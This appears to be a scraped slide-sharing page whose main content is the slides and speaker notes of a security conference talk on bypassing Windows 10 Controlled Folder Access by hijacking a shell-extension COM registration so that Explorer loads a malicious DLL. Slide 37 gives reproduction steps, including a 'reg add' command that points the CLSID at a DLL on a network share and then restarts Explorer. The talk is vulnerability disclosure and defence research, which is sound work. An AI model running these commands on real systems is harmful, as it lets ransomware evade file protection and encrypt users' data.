Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
Matt Welsh
 
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Natan Silnitsky
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
Neo4j
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
Juraj Vysvader
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
Globus
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
Globus
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Mind IT Systems
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
Globus
 

Recently uploaded (20)

Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket ManagementUtilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
 
Enterprise Resource Planning System in Telangana
Enterprise Resource Planning System in TelanganaEnterprise Resource Planning System in Telangana
Enterprise Resource Planning System in Telangana
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
 
Top 7 Unique WhatsApp API Benefits | Saudi Arabia
Top 7 Unique WhatsApp API Benefits | Saudi ArabiaTop 7 Unique WhatsApp API Benefits | Saudi Arabia
Top 7 Unique WhatsApp API Benefits | Saudi Arabia
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
 
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.ILBeyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
Beyond Event Sourcing - Embracing CRUD for Wix Platform - Java.IL
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
 
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
 
Understanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSageUnderstanding Globus Data Transfers with NetSage
Understanding Globus Data Transfers with NetSage
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
 

An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami

  • 1. An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
  • 2. My Profile 1992 ~ 2015 software developer of Windows. 2015 ~ security researcher - 2016 AVTOKYO - 2017 BSides Las Vegas - 2018 GrrCON - 2018 ToorCon - 2018 DerbyCon - 2018 AVTOKYO 2018 ~ BSides Tokyo Organizer - 2018 first BSides in East Asia SOYA AOYAMA Researcher @ Fujitsu System Integration Laboratories Ltd Organizer @ BSides Tokyo
  • 3. History 2016 2017 2018 2019 Research the jump the AirGap BSides Las Vegas
  • 7. TANMAY GANACHARYA Principal Group Manager, Windows Defender Research Ransomware protection on Windows 10 For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files. https://www.microsoft.com/security/blog/2017/10/23/ stopping-ransomware-where-it-counts-protecting- your-data-with-controlled-folder-access/
  • 8.
  • 9.
  • 12. Windows system folders are NOT protected by default.
  • 13.
  • 17. apps folders Ransomware protection Mechanism allowed apps cmdExplorer Protected folders Documents Pictures PowerShell System32
  • 18. You ain’t Seen nothin' yet!
  • 19. app folders Simple Idea allowed apps cmdExplorer Protected folders Documents Pictures PowerShell System32
  • 20. YAGO JESUS MICROSOFT ANTI RANSOMWARE BYPASS By default, Office executables are included in the whitelist so these programs could make changes in protected folders without restrictions. This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically. So a Ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly for the files owner http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html
  • 23. Only using a registry
  • 24.
  • 25.
  • 26. • HKCR = HKLM Software Classes + HKCU Software Classes • HKLM Software Classes < HKCU Software Classes (In case of duplication)
  • 27. {90AA3A4E-1CBA-4233-B8BB-535773D48449} • HKLMSOFTWARE Classes CLSID • HKCU Software Classes CLSID
  • 29. How about other antimalware application?
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35. No antimalware application can block my malware
  • 36. I submitted the vulnerability report to MSRC
  • 37. This is revenge • Step-by-step instructions to reproduce the issue on a fresh install 1. Put the malicious dll on shared file server. (10.0.1.40shareAnti-ControlledFolderAccess.dll) 2. Start the cmd.exe on target PC. (An administrator privilege is NOT required) 3. Execute the following command. 4. Start the procexp.exe on target PC. reg add HKCUSoftwareClassesCLSID{90AA3A4E-1CBA-4233-B8BB-535773D48449} InprocServer32 /f /ve /t REG_SZ /d 10.0.1.40tmpAnti-ControlledFolderAccess.dll taskkill /IM explorer.exe /F start explorer.exe
  • 39. Microsoft Security Servicing Criteria for Windows Security boundaries Security Boundary SecurityGoal Network boundary An unauthorized network endpoint cannot access or tamper with the code and data on a customer’s device. Kernel boundary A non-administrative user mode process cannot access or tamper with kernel code and data. Administrator-to-kernel is not a security boundary. Process boundary An unauthorized user mode process cannot access or tamper with the code and data of another process. AppContainer sandbox boundary An AppContainer-based sandbox process cannot access or tamper with code and data outside of the sandbox based on the container capabilities User boundary A user cannot access or tamper with the code and data of another user without being authorized. Session boundary A user logon session cannot access or tamper with another user logon session without being authorized. Web browser boundary An unauthorized website cannot violate the same-origin policy, nor can it access or tamper with the native code and data of the Microsoft Edge web browser sandbox. Virtual machine boundary An unauthorized Hyper-V guest virtual machine cannot access or tamper with the code and data of another guest virtual machine; this includes Hyper-V Isolated Containers. Virtual Secure Mode boundary Data and code within a VSM trustlet or enclave cannot be accessed or tampered with by code executing outside of the VSM trustlet or enclave.
  • 40. NOT covered by active bug bounty programs. Defense-in-depth security features Security feature Security Goal User Account Control (UAC) Prevent unwanted system-wide changes (files, registry, etc) without administrator consent AppLocker Prevent unauthorized applications from executing Controlled Folder Access Protect access and modification to controlled folders from apps that may be malicious Mark of the Web (MOTW) Prevent active content download from the web from elevating privileges when viewed locally Kernel Address Space Layout Randomization (KASLR) The layout of the kernel virtual address space is not predictable to an attacker (on 64- bit) Control Flow Guard (CFG) CFG protected code can only make indirect calls to valid indirect call targets Windows Defender Exploit Guard (WDEG) Allow apps to enable additional defense-in-depth exploit mitigation features that make it more difficult to exploit vulnerabilities Protected Process Light (PPL) Prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process functions Shielded Virtual Machines Help protect a VM’s secrets and its data against malicious fabric admins or malware running on the host from both runtime and offline attacks https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
  • 41. I can - Escalate privileges to administrator - Evading the Ransomware Protection By inject to Explorer
  • 42. I’d like to suggest to Microsoft -Load only the signed dll -Implement the ControlledDllLoad mechanism

Editor's Notes

  1. Hello everyone. Today, I’ll give a presentation about… "Evading the Ransomware Protection in Windows 10" This is an inconvenient truth for Microsoft. I’ll be happy to answer any questions… at the end of my talk. ⏎
  2. First, let me introduce myself. I’m Soya Aoyama. I’m security researcher @ Fujitsu System Integration Laboratories Limited, and organizer @ B-Sides Tokyo. I’ve been working for Fujitsu more than 20 years… as Windows software developer. I wrote NDIS drivers, Bluetooth profiles, Winsock applications, and more. I’ve started security research… about 4 years ago. My first presentation was @ AV-TOKYO. It’s one of the most famous security conference in Japan, and the motto is “no drink, no hack.”. So, I gave a presentation while drinking. To be honest, I’d like to do the same today, but I refrain from it. ⏎
  3. This is the history of my research. 3 years ago, I was researching the jump the Air-Gap by Wi-Fi. I needed administrator privileges… to change the Wi-Fi settings. I replaced the OneDrive’s dll with malicious one, and injected malicious program into Explorer. The program injected itself into another application, and got administrator privileges. 2 years ago, I talked about the method @ B-Sides Las Vegas. And now, I found the way to evading the Ransomware Protection in Windows 10… using malicious dll. I’ll explain the contents from now. ⏎
  4. May 12, 2017… Do you remember? ⏎
  5. Yes. It’s the day of cyber-attack by Wanna-Cry. Wanna-Cry caused tremendous damage… all over the world. ⏎
  6. Microsoft gave one answer against ransomware, such as Wanna-Cry. It’s literally... ⏎
  7. Ransomware protection!! This is part of a quote from a Microsoft blog. Actually, there is more description. I didn’t want to read it, so I examined the actual behavior. I’ll explain about the behavior of "Ransomware protection", and the minor issues found during the examination. ⏎
  8. This is “Ransomware protection” screen… in Windows Defender Security Center. Ransomware protection is off by default, and if you turn it on, ⏎ “Protected folders” and “allow an app through Controlled folder access” are displayed. We’ll look at each item in detail. ⏎
  9. First, It’s the “Protected folders”. You can add the folder… that you want to protect. And this is a list of folders protected by default. Documents, Pictures, Videos, Music, Desktop and Favorites. Just a moment.  ⏎ There is phrase of… “Windows system folders are protected by default” here. The system folder is usually “c:\windows\system32”. However, the folder is not included in this list. ⏎
  10. What is the truth? I’ll show you in demonstration from now. [DEMO 1] The truth is… ⏎
  11. What is the truth? I’ll show you in demonstration from now. [DEMO 1] The truth is… ⏎
  12. Windows system folder is not protected by default. I think that Microsoft should rewrite… the “Windows system folder” to “user data folder”. ⏎
  13. Next, It’s “Allow an app through Controlled folder access”. You can add the application… that you want to allow access to “Protected Folder”. Unlike the previous screen, there is no default list. Just a moment.  ⏎ There is phrase of… “Apps determined by Microsoft as friendly are always allowed“ here. What application is the friendly? According to previous demonstration, we knew that PowerShell is not covered. It seems… that not all applications of Microsoft are included in the “friendly”. Then what about third-party applications? ⏎
  14. What is the truth? I’ll show you in demonstration from now. [DEMO 2] The truth is… ⏎
  15. What is the truth? I’ll show you in demonstration from now. [DEMO 1] The truth is… ⏎
  16. Microsoft only knows. ⏎
  17. This is the mechanism of Ransomware protection. All applications have access to all folders… by default. When administrator enables “controlled folder access”, ⏎ Only “allowed apps” can become access “protected folders”, and other apps cannot become access these. ⏎ Administrator can add apps to “allowed apps”, ⏎ and folders to “protected folders”. ⏎
  18. You Ain’t Seen Nothin’ Yet! Now, I found a vulnerability of “Ransomware protection”. ⏎
  19. This idea is very simple. ⏎ We can probably access the “protected folders”… by injecting malware into the “allowed apps”. ⏎
  20. As I thought there was similar research. Yago’s idea is using Microsoft Office. He succeeded in accessing the protected folders… using an OLE object… with embedded malware. ⏎
  21. What is my method? I’ll show you in demonstration from now. [DEMO 3] My method is… ⏎
  22. What is the truth? I’ll show you in demonstration from now. [DEMO 1] The truth is… ⏎
  23. Just use a registry. I will explain the mechanism. ⏎
  24. Needless to say, It’s registry. There is a shell extension list, loads by Explorer. This time, ⏎ I used this GUID. ⏎
  25. The actual value of GUID is under HKCR. It’s shell32.dll. ⏎
  26. About HKCR is written on Windows Dev Center. Simply speaking, HKCR is that merges HKLM with HKCU, and HKCU takes precedence from HKLM. You need administrator privileges… to change the value of HKLM, unlike HKCU. This means… that you can overwrite rewritable values by administrator privileges… with rewritable values by user privileges. Is this a bug? Wrong. For example, Explorer is assigned as the default application… for decompress zip files. However, you may want to use a different application like 7zip. There is this registry for its assignment. This time, I abuse this specification. ⏎
  27. In this case of this GUID, there is a dll information in HKLM, but not in HKCU. So, if we write another value to HKCU, we can change value of HKCR. ⏎
  28. This is the file encryption process. Normally, the value in HKLM is reflected in HKCR, Explorer reads it, and loads correct dll. However, we can write a path of malicious dll in HKCU… with user privileges, ⏎ and its value is reflected in HKCR. ⏎ Explorer reads it, and loads malicious dll. ⏎ As a result, ⏎ the malicious DLL loaded into Explorer, can encrypt the user files. ⏎
  29. We understood about the “Ransomware protection” of Windows 10. Then, how about others anti-malware application? ⏎
  30. A bit old information, this is a Market share of Windows anti-malware application vendors. ⏎ There are Avast, E-set, Malwarebytes, McAfee, and more. I checked several anti-malware applications. ⏎
  31. First, It’s Avast Internet Security. It has ⏎ the “Ransomware Shield”. However, ⏎ my malicious dll was able to encrypt the text file… without being protected. ⏎
  32. Next, It’s E-SET Smart security. It has ⏎ the “Ransomware Shield”. However, ⏎ It’s the same result. ⏎
  33. Next, It’s Malwarebytes Premium. It has ⏎ the “Ransomware Protection”. However, ⏎ It’s the same result. ⏎
  34. Next, It’s McAfee Total Protection. It has ⏎ the “Ransomware Interceptor”. However, ⏎ It’s the same result. ⏎
  35. As far as I’ve checked, anti-malware applications cannot protect my ransomware. Of course, there may be applications that can be protected at this time. ⏎
  36. 3 years ago, I submitted a vulnerability report… to the Microsoft Security Response Center… about being able to inject into Explorer… using OneDrive’s problem. Because I thought it very dangerous vulnerability, and I wanted a little pocket money. However, MSRC said… they do not have to pay the reward. ⏎
  37. This is revenge. Unlike the last time, it’s a basic problem of Windows 10 about registry. The result is… ⏎
  38. As I thought, it was the same answer. ⏎ Because, this does not meet the bar for security servicing. ⏎
  39. I cannot receive reward every time, so I examined the bar for security servicing. Certainly, this problem does not seem to meet it. ⏎
  40. Moreover, ⏎ It was written… that “Controlled Folder Access” is not covered by the Bug Bounty program. Cannot help it. I’ll give up on the reward money anymore. ⏎
  41. However, by inject to Explorer, “Escalate privileges to administrator”, and “Evading the Ransomware Protection” are an unwavering fact. Is it okay to leave the problem? ⏎
  42. Therefore, I’d like to suggest the following implementation to Microsoft… as one of the defense-in-depth security features. First, it’s to load only the signed dll. This means that prevents the loading of the tampered dll. The other is to implement the “Controlled dll load” mechanism. This means that user select the DLL… that the process can load, like “Controlled Folder Access”. I think that Microsoft needs to take action as soon as possible, as it does anything. ⏎
  43. OK, my presentation is over. Thank you very much.